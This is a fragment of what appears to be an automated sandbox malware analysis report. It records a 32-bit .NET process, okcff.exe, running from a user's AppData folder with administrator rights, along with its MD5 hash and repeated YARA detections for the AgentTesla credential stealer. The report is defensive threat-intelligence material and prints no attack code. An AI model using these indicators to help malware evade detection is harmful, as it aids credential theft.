                                                          Path:C:\Users\user\AppData\Roaming\okcff.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Roaming\okcff.exe
                                                          Imagebase:0x9f0000
                                                          File size:194560 bytes
                                                          MD5 hash:E9416A322E9A796D45588BC4FB04CD45
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000002.699544517.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000029.00000002.699544517.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000000.616337144.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000029.00000000.616337144.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000000.618395445.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000029.00000000.618395445.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000000.617550638.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000029.00000000.617550638.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000002.700177359.00000000022A1000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000029.00000002.700177359.00000000022A1000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000000.615331968.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000029.00000000.615331968.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

                                                          Disassembly

                                                          Code Analysis

                                                          Reset < >